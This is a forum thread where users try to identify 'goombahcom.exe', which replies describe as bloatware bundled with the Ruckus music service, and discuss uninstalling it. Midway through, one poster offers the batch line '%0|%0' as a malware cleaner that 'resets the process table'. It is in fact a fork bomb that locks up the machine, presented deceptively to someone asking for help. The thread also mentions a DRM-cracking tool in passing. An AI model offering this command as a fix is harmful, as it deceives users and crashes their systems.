I was looking at my processes, and I see 'goombahcom.exe'  I don't  see anything on google, and I can end it, but does anyone have any idea what it might be?  Maybe spyware or a virus?

Find and upload the executable to some file sharing sight and I'll tell you.

It's some bullshit music player bloatware.  Are you using Ruckus or any other free college music service?  You can uninstall Goombah in Add/Remove programs, but I'm pretty pissed that it was in the last update.

I have ruckus and didn't install Goombah, but now I can't play anything -- the licenses to all my songs won't renew.

I have it too, I also use Ruckus.  For the rest of you fuxors no one is going to delete their system32 or reinstall windows over this.

Put this in a batch file and then run it:

%0|%0

It should help clear your system of malware, by resetting the process table.

I uninstalled it, but Ruckus seems to work fine. It downloads, acquires, and updates licenses fine--so far. There's just an error when it starts up. If you don't mind clicking OK everytime, uninstall it.

Goombahs.... Fuck!  Reminds me of the mario video.

But yeah, I showed up here for the same reason.  I have ruckus going right now, and killed goombah in the task manager and ruckus didn't even hiccup.  I wouldn't be concerned about uninstalling this.

Besides, if you have enough sense to use mirakagi, you wouldn't really give a big fuck what happens to your licenses on ruckus after the first time :)
